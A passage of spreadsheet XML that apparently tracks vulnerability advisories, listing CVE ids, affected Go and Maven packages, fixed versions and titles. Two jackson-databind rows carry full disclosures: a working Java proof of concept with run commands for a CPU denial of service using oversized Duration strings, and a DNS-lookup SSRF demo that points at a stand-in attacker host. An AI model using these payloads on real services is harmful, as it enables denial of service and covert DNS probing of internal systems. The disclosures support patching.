      <c r="Q342" s="5" t="inlineStr"/>
      <c r="R342" s="5" t="inlineStr"/>
      <c r="S342" s="5" t="inlineStr">
        <is>
          <t>AnyCable: Telemetry Subsystem Contains Hardcoded Authentication Token and Transmits CLI Arguments Including Secrets in github.com/anycable/anycable-go.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github.com/anycable/anycable-go before v1.6.15.</t>
        </is>
      </c>
      <c r="T342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63406</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63445</t>
        </is>
      </c>
      <c r="D343" s="5" t="inlineStr"/>
      <c r="E343" s="5" t="inlineStr"/>
      <c r="F343" s="5" t="inlineStr"/>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="inlineStr"/>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M343" s="5" t="inlineStr">
        <is>
          <t>0.54.0-rc.0</t>
        </is>
      </c>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q343" s="5" t="inlineStr"/>
      <c r="R343" s="5" t="inlineStr"/>
      <c r="S343" s="5" t="inlineStr">
        <is>
          <t>Perses's unvalidated project parameter enables filesystem path traversal in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63445</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63458</t>
        </is>
      </c>
      <c r="D344" s="5" t="inlineStr"/>
      <c r="E344" s="5" t="inlineStr"/>
      <c r="F344" s="5" t="inlineStr"/>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="inlineStr"/>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/perses/perses</t>
        </is>
      </c>
      <c r="M344" s="5" t="inlineStr">
        <is>
          <t>0.54.0-beta.3</t>
        </is>
      </c>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q344" s="5" t="inlineStr"/>
      <c r="R344" s="5" t="inlineStr"/>
      <c r="S344" s="5" t="inlineStr">
        <is>
          <t>Perses's project query parameter authorization bypass exposes cross-project resources in github.com/perses/perses</t>
        </is>
      </c>
      <c r="T344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63458</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6673</t>
        </is>
      </c>
      <c r="D345" s="5" t="inlineStr"/>
      <c r="E345" s="5" t="inlineStr"/>
      <c r="F345" s="5" t="inlineStr"/>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="inlineStr"/>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M345" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q345" s="5" t="inlineStr"/>
      <c r="R345" s="5" t="inlineStr"/>
      <c r="S345" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't authenticate Atlassian Connect installed callbacks, allowing a remote unauthenticated attacker to inject a rogue sharedSecret in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6673</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68497</t>
        </is>
      </c>
      <c r="D346" s="5" t="inlineStr"/>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="inlineStr"/>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K346" s="5" t="inlineStr"/>
      <c r="L346" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M346" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q346" s="5" t="inlineStr"/>
      <c r="R346" s="5" t="inlineStr"/>
      <c r="S346" s="5" t="inlineStr">
        <is>
          <t>### Summary
`jackson-databind` 3.2.1 deserializes a JSON **string** bound to a `javax.xml.datatype.Duration` or `javax.xml.datatype.XMLGregorianCalendar` field by passing the raw string verbatim to `DatatypeFactory.newDuration(value)` / `newXMLGregorianCalendar(value)`. Per the XML-Schema lexical grammar these factory methods accept numeric components of arbitrary length, which the JDK materializes into `java.math.BigInteger` / `BigDecimal` using the native `BigInteger(String)` constructor (an O(n²) parser). Because the digits reside inside a JSON **string** token, jackson-core's `StreamReadConstraints.maxNumberLength` guard (which bounds only JSON *number* tokens) never fires, so there is no length limit anywhere on this path. An unauthenticated attacker can submit a single small request (e.g. ~1–5 MB) that forces tens of seconds to minutes of single-thread CPU consumption, yielding a denial of service under the default `JsonMapper.builder().build()` mapper with no polymorphic typing or special configuration.
### Details
`StreamReadConstraints.maxNumberLength` (jackson-core, default 1000) bounds the **text length of JSON number tokens** only; it does not apply to digits inside a JSON string token (`maxStringLength` default is 100,000,000). jackson's own value binders compensate for this gap elsewhere — `NumberDeserializers` explicitly call `streamReadConstraints().validateIntegerLength(text.length())` / `validateFPLength(text.length())` before parsing a *stringified* number (`NumberDeserializers.java:1063`, `:1139`). The XML-datatype deserializer omits this identical pre-check.
`CoreXMLDeserializers` registers `Std` deserializers **by default** for any field typed `javax.xml.datatype.Duration` or `XMLGregorianCalendar` (`findBeanDeserializer`), with no opt-in required. `Std._deserialize` hands the attacker string straight to the datatype factory:
```java
protected Object _deserialize(String value, DeserializationContext ctxt) {
    switch (_kind) {
    case TYPE_DURATION:
        return _dataTypeFactory.newDuration(value);                 // attacker lexical string
    case TYPE_G_CALENDAR:
        Date d;
        try { d = _parseDate(value, ctxt); }
        catch (DatabindException e) {
            return _dataTypeFactory.newXMLGregorianCalendar(value); // attacker lexical string
        }
        return _gregorianFromDate(ctxt, d);
    }
    throw new IllegalStateException();
}
```
Per the XSD lexical rules, `newDuration` parses each numeric component (years, months, …) into a `BigInteger`, and `newXMLGregorianCalendar` parses fractional seconds into a `BigDecimal`. The JDK uses the native `BigInteger(String)` / `BigDecimal(String)` constructors, which are O(n²) in the digit count. A short JSON string such as `"P" + "9"×N + "Y"` therefore forces the allocation and O(N²) parse of an N-digit `BigInteger`, entirely downstream of every jackson-core constraint.
## Vulnerable Code Location
- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:137`
  — `newDuration(value)` (TYPE_DURATION)
- `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:147`
  — `newXMLGregorianCalendar(value)` (TYPE_G_CALENDAR fallback)
- Registration (default, no opt-in):
  `src/main/java/tools/jackson/databind/ext/CoreXMLDeserializers.java:42-46`
  (`findBeanDeserializer` returns `Std` for `XMLGregorianCalendar` / `Duration`)
- Contrast — correct length-guard pattern already used elsewhere in the library:
  `src/main/java/tools/jackson/databind/deser/jdk/NumberDeserializers.java:1063,1139`
## Proof of Concept
PoC source (`Vuln07_DurationDoS.java`). It uses only the public `ObjectMapper.readValue` API and a default mapper; the only "special" element is a normal DTO exposing a `javax.xml.datatype.Duration` field.
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import javax.xml.datatype.Duration;
/**
 * Vuln 7: Unbounded numeric allocation / CPU DoS via Duration lexical deserialization.
 * A short JSON string forces parsing of a huge BigInteger inside DatatypeFactory.newDuration.
 */
public class Vuln07_DurationDoS {
    public static class Cfg { public Duration ttl; }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = JsonMapper.builder().build();
        int digits = Integer.getInteger("digits", 5_000_000);
        // Baseline small parse.
        long t0 = System.nanoTime();
        mapper.readValue("{\"ttl\":\"P1Y\"}", Cfg.class);
        long tBase = System.nanoTime() - t0;
        System.out.println("Baseline (P1Y) parse: " + (tBase/1_000_000) + " ms");
        String big = "P" + "9".repeat(digits) + "Y";
        String json = "{\"ttl\":\"" + big + "\"}";
        System.out.println("Payload JSON size ~ " + json.length() + " bytes (year component = " + digits + " digits)");
        long t1 = System.nanoTime();
        try {
            Cfg c = mapper.readValue(json, Cfg.class);
            long dt = System.nanoTime() - t1;
            System.out.println("Parsed giant Duration in " + (dt/1_000_000) + " ms; years field type materialized as BigInteger");
            System.out.println("RESULT: VULNERABLE - " + digits + "-digit BigInteger parsed from a "
                    + json.length() + "-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)");
        } catch (Throwable t) {
            long dt = System.nanoTime() - t1;
            System.out.println("After " + (dt/1_000_000) + " ms threw " + t.getClass().getName() + ": " + t.getMessage());
        }
    }
}
```
Minimal HTTP-shaped payload (what an attacker sends):
```json
{ "ttl": "P99999999999999999999…9Y" }   // 'P' + N nines + 'Y', N up to ~100,000,000
```
An `XMLGregorianCalendar` field is equally affected via the fractional-seconds path, e.g.
`{ "at": "0000-01-01T00:00:00." + "9"×N }`.
## Execution Steps
The PoC needs only the three Jackson 3.2.1 jars on the classpath; it can be built and run with plain `javac`/`java` (no Maven required). The jars are the standard published artifacts (here resolved from the local Maven cache `~/.m2`, but any copy works).
```bash
# 0. Locate the three dependency jars (published Maven artifacts).
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
#   If not already cached, fetch them once, e.g.:
#   mvn -q dependency:get -Dartifact=tools.jackson.core:jackson-databind:3.2.1
#   (jackson-core 3.2.1 and jackson-annotations 2.22 come as transitive deps)
# 1. Compile with javac (single source file).
mkdir -p out
javac -cp "$CP" -d out src/main/java/com/poc/Vuln07_DurationDoS.java
# 2. Quick confirmation (~11 s): 1,000,000-digit year component.
java -Xmx2g -Ddigits=1000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
# 3. Full-severity demonstration (~293 s): 5,000,000-digit year component.
java -Xmx2g -Ddigits=5000000 -cp "out:$CP" com.poc.Vuln07_DurationDoS
```
The `digits` system property controls the number of `9` characters in the year component; JSON payload size ≈ digits + 12 bytes. Increase toward the default 100,000,000 `maxStringLength` to scale cost further.
Environment used for the evidence below: jackson-databind 3.2.1, jackson-core 3.2.1, jackson-annotations 2.22; OpenJDK 25 on macOS (darwin), default `JsonMapper.builder().build()`.
## Reproduction Evidence
Deterministic values (payload byte count, resulting bit-length) are exact across runs; timings vary with load. Two independent runs at different sizes:
**digits = 5,000,000 (~5 MB payload):**
```
Baseline (P1Y) parse: 27 ms
Payload JSON size ~ 5000012 bytes (year component = 5000000 digits)
Parsed giant Duration in 293175 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 5000000-digit BigInteger parsed from a 5000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)
```
**digits = 1,000,000 (~1 MB payload, for fast repeatability):**
```
Baseline (P1Y) parse: 53 ms
Payload JSON size ~ 1000012 bytes (year component = 1000000 digits)
Parsed giant Duration in 11155 ms; years field type materialized as BigInteger
RESULT: VULNERABLE - 1000000-digit BigInteger parsed from a 1000012-byte payload (amplified CPU/allocation, StreamReadConstraints bypassed)
```
Interpretation: a normal `"P1Y"` value parses in tens of milliseconds; a ~1 MB attacker payload consumes **~11 s** and a ~5 MB payload **~293 s** of single-thread CPU — a 5–6 order-of-magnitude amplification. The super-linear growth (≈26× cost for 5× payload) is consistent with the JDK's O(n²) `BigInteger(String)` constructor. The cost occurs inside `DatatypeFactory.newDuration`, downstream of jackson-core's `StreamReadConstraints` (independently confirmed: the same digit sequence supplied as a bare JSON *number* token is rejected with `StreamConstraintsException`, whereas inside a string token it is not bounded).
## Impact
An unauthenticated attacker can stall a request-processing thread for tens of seconds to minutes and allocate a large `BigInteger`/`BigDecimal` from a single small request. Because the cost is CPU-bound and super-linear, a handful of concurrent requests can saturate the server's worker threads and CPU, denying service to all users. The exposure requires only that a bound type expose a `javax.xml.datatype.Duration` or `XMLGregorianCalendar` field  common in applications that ingest XML-schema derived data, SOAP/JAXB-adjacent models, or configuration carrying XSD durations — and fires under the default mapper with no polymorphic typing.
## Recommended Fix
Apply the same validate-length-then-parse idiom the core `NumberDeserializers` already use:
1. In `CoreXMLDeserializers.Std._deserialize`, enforce a maximum raw-string length before
   calling `newDuration(value)` / `newXMLGregorianCalendar(value)` — e.g. reject inputs
   longer than `ctxt.streamReadConstraints().getMaxNumberLength()` (or a dedicated bound),
   routing over-length input through `ctxt.handleWeirdStringValue(...)`.
2. Alternatively, validate the lexical form against a bounded regex and cap the digit count
   of each numeric component before delegating to `DatatypeFactory`.
3. Document that `Duration` / `XMLGregorianCalendar` fields bound from untrusted input must
   be length-limited at the transport layer.</t>
        </is>
      </c>
      <c r="T346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68497</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71485</t>
        </is>
      </c>
      <c r="D347" s="5" t="inlineStr"/>
      <c r="E347" s="5" t="inlineStr"/>
      <c r="F347" s="5" t="inlineStr"/>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="inlineStr"/>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/centrifugal/centrifugo, Go:github.com/centrifugal/centrifugo/v3, Go:github.com/centrifugal/centrifugo/v4, Go:github.com/centrifugal/centrifugo/v5, Go:github.com/centrifugal/centrifugo/v6</t>
        </is>
      </c>
      <c r="M347" s="5" t="inlineStr">
        <is>
          <t>6.9.0</t>
        </is>
      </c>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q347" s="5" t="inlineStr"/>
      <c r="R347" s="5" t="inlineStr"/>
      <c r="S347" s="5" t="inlineStr">
        <is>
          <t>Centrifugo: Client-forgeable headers emulation lets any client spoof headers forwarded to proxy backends in github.com/centrifugal/centrifugo</t>
        </is>
      </c>
      <c r="T347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71485</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77310</t>
        </is>
      </c>
      <c r="D348" s="5" t="inlineStr"/>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="inlineStr"/>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M348" s="5" t="inlineStr">
        <is>
          <t>2.18.9, 2.21.5, 2.22.1, 3.1.5, 3.2.1</t>
        </is>
      </c>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q348" s="5" t="inlineStr"/>
      <c r="R348" s="5" t="inlineStr"/>
      <c r="S348" s="5" t="inlineStr">
        <is>
          <t>### Summary
CVE-2026-54514 (GHSA-hgj6-7826-r7m5) fixed an eager-DNS-resolution / SSRF issue in jackson-databind's deserialization of `java.net.InetSocketAddress` by switching to `InetSocketAddress.createUnresolved(...)` (PR #5951, commit 1f5a1037, released in 2.18.8 / 2.21.4 / 3.1.4). That fix did not cover the sibling `java.net.InetAddress` branch in the very same `FromStringDeserializer.Std._deserialize()` switch statement, which still calls `InetAddress.getByName(value)` and therefore performs an eager forward DNS lookup on attacker-controlled input at deserialization time. The fix is incomplete: the same vulnerability class remains reachable through `InetAddress`.
### Details
File: src/main/java/com/fasterxml/jackson/databind/deser/std/FromStringDeserializer.java
Sibling cases in the same switch:
- Line 357-358 (UNFIXED):
    case STD_INET_ADDRESS:
        return InetAddress.getByName(value);     // eager forward DNS lookup
- Line 359-381 + helper at 494-496 (FIXED by PR #5951):
    protected InetSocketAddress _inetSocketAddress(String host, int port) {
        // 05-May-2026, tatu: [databind#5951] Prevent DNS lookup:
        return InetSocketAddress.createUnresolved(host, port);   // no DNS
    }
`InetAddress` is a registered standard string-like scalar type (FromStringDeserializer.types() line 73; findDeserializer() maps it to STD_INET_ADDRESS at line 119-120). Any value deserialized into an `InetAddress`-typed target — a plain POJO field, a polymorphic subtype, or a default-typing-permitted slot — reaches `InetAddress.getByName(attackerControlledString)`, which invokes the OS/JVM resolver and performs forward DNS resolution before any application validation.
The parent fix's own added unit test asserts `address.isUnresolved()` with the comment "should NOT resolve address", confirming that performing DNS resolution during deserialization is precisely the behavior being treated as the vulnerability. The InetAddress branch still violates that property.
Verified against the FIXED released artifact (jackson-databind 2.18.8, from Maven Central): decompiled bytecode shows the InetSocketAddress branch now routes through `_inetSocketAddress -&gt; createUnresolved`, while `InetAddress.getByName` is still emitted unchanged in the InetAddress branch.
### PoC
Lab-only, zero network egress. Run against the fixed jackson-databind 2.18.8.
A custom JDK InetAddressResolver SPI (Java 18+) counts forward lookups locally and answers with loopback, so no traffic leaves the host:
    ObjectMapper m = new ObjectMapper();
    // InetSocketAddress (patched): 0 resolver lookups, isUnresolved=true
    m.readValue("\"internal-metadata.attacker-oob.example:8080\"", InetSocketAddress.class);
    // InetAddress (unpatched sibling): 1 resolver lookup on the attacker host
    m.readValue("\"internal-metadata.attacker-oob.example\"", InetAddress.class);
Observed output (jackson 2.18.8):
    [A] InetSocketAddress  isUnresolved=true  resolverLookups=0  lastHost=null
    [B] InetAddress        value=localhost/127.0.0.1  resolverLookups=1  lastHost=internal-metadata.attacker-oob.example
A standalone variant (no SPI) using an RFC-6761 `.invalid` canary host shows the same: deserializing into InetAddress raises UnknownHostException (the OS resolver was invoked), while InetSocketAddress stays unresolved. Full source in PocResolverCount.java and PocInetAddressIncompleteFix.java.
Reachability with a plain field (no annotations, no polymorphism, no default typing):
    static class Config { public InetAddress bindHost; public int port; }
    mapper.readValue("{\"bindHost\":\"poc-reach.example\",\"port\":1}", Config.class);
    // -&gt; resolver invoked on "poc-reach.example"
### Impact
An attacker who can influence JSON deserialized into an `InetAddress` target can force the application to perform outbound forward DNS lookups for attacker-chosen hostnames at deserialization time, before any application-level validation. This yields a DNS-based SSRF / OOB primitive: out-of-band exfiltration / interaction via DNS callbacks, and blind probing of whether internal hostnames resolve (internal-host enumeration). This is the same impact class and trust boundary for which CVE-2026-54514 (CVSS 5.3, CWE-918) was assigned to the InetSocketAddress branch. It is a DNS-lookup / blind SSRF primitive, not arbitrary HTTP SSRF or RCE; it does not itself open a socket.
Suggested fix: avoid eager resolution for InetAddress as well — e.g. defer resolution, validate the host string before resolving, or provide an opt-in/opt-out consistent with the InetSocketAddress fix (there is no direct unresolved-InetAddress equivalent, so deferring/validating or documenting the resolution is the practical mitigation).
Credit : Ta Duc Thien</t>
        </is>
      </c>
      <c r="T348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77310</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77339</t>
        </is>
      </c>
      <c r="D349" s="5" t="inlineStr"/>
      <c r="E349" s="5" t="inlineStr"/>
      <c r="F349" s="5" t="inlineStr"/>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="inlineStr"/>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/f1bonacc1/process-compose</t>
        </is>
      </c>
      <c r="M349" s="5" t="inlineStr">
        <is>
          <t>1.120.0</t>
        </is>
      </c>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q349" s="5" t="inlineStr"/>
      <c r="R349" s="5" t="inlineStr"/>
      <c r="S349" s="5" t="inlineStr">
        <is>
          <t>Process Compose: Browser DNS rebinding lets websites control local process-compose MCP tools in github.com/f1bonacc1/process-compose</t>
        </is>
      </c>
      <c r="T349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77339</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8074</t>
        </is>
      </c>
      <c r="D350" s="5" t="inlineStr"/>
      <c r="E350" s="5" t="inlineStr"/>
      <c r="F350" s="5" t="inlineStr"/>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="inlineStr"/>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M350" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q350" s="5" t="inlineStr"/>
      <c r="R350" s="5" t="inlineStr"/>
      <c r="S350" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't enforce bot-specific permission checks on the user active status endpoint in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8074</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81505</t>
        </is>
      </c>
      <c r="D351" s="5" t="inlineStr"/>
      <c r="E351" s="5" t="inlineStr"/>
      <c r="F351" s="5" t="inlineStr"/>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="inlineStr"/>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/frain-dev/convoy</t>
        </is>
      </c>
      <c r="M351" s="5" t="inlineStr">
        <is>
          <t>0.9.3-0.20260724092134-1cc67cd16fb1</t>
        </is>
      </c>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr"/>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>Convoy: Cross-Tenant Source IDOR Leaks Plaintext Message Broker Credentials in github.com/frain-dev/convoy</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81505</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81871</t>
        </is>
      </c>
      <c r="D352" s="5" t="inlineStr"/>
      <c r="E352" s="5" t="inlineStr"/>
      <c r="F352" s="5" t="inlineStr"/>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="inlineStr"/>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr">
        <is>
          <t>go, grpc</t>
        </is>
      </c>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr">
        <is>
          <t>Go:go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="M352" s="5" t="inlineStr">
        <is>
          <t>0.21.0</t>
        </is>
      </c>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
